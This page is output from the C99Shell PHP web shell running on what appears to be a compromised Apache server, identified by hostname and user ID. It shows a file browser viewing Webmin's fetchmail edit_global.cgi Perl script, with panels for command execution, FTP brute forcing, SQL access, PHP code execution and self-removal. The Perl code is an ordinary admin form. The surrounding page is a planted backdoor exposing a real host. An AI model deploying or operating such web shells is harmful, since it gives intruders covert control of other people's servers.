!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/fetchmail/   drwxr-xr-x
Free 28.51 GB of 117.98 GB (24.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     edit_global.cgi (1.82 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# edit_global.cgi
# Edit options for all poll sections in a file

require './fetchmail-lib.pl';
&ReadParse();

if ($config{'config_file'}) {
    $file = $config{'config_file'};
    }
else {
    &can_edit_user($in{'user'}) || &error($text{'poll_ecannot'});
    @uinfo = getpwnam($in{'user'});
    $file = "$uinfo[7]/.fetchmailrc";
    $uheader = &text('poll_foruser', "<tt>$in{'user'}</tt>");
    }

&ui_print_header($uheader, $text{'global_title'}, "");

@conf = &parse_config_file($file);
foreach $c (@conf) {
    $poll = $c if ($c->{'defaults'});
    }

# Show default server options
print &ui_form_start("save_global.cgi", "post");
print &ui_hidden("file", $file);
print &ui_hidden("user", $in{'user'});
print &ui_table_start($text{'global_header'}, "width=100%", 2);

# Protocol
print &ui_table_row($text{'poll_proto'},
    &ui_select("proto", lc($poll->{'proto'}),
           [ [ '', $text{'default'} ],
             map { [ $_, uc($_) ] } ('pop3', 'pop2', 'imap', 'imap-k4', 'imap-gss', 'apop', 'kpop'),
           ], 1, 0, 1));

# Port number
print &ui_table_row($text{'poll_port'},
    &ui_opt_textbox("port", $poll->{'port'}, 8, $text{'default'}));

# Network interface to check
@interface = split(/\//, $poll->{'interface'});
print &ui_table_row($text{'poll_interface'},
    &ui_radio("interface_def", @interface ? 0 : 1,
          [ [ 1, $text{'poll_interface_def'} ],
            [ 0, $text{'poll_interface_ifc'} ] ])."\n".
    &ui_textbox("interface", $interface[0], 8)." ".
    $text{'poll_interface_ip'}." ".
    &ui_textbox("interface_net", $interface[1], 15)." / ".
    &ui_textbox("interface_mask", $interface[2], 15));

print &ui_table_end();
print &ui_form_end([ [ undef, $text{'save'} ] ]);

if (!$fetchmail_config && $config{'view_mode'}) {
    &ui_print_footer("edit_user.cgi?user=$in{'user'}", $text{'user_return'},
             "", $text{'index_return'});
    }
else {
    &ui_print_footer("", $text{'index_return'});
    }


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--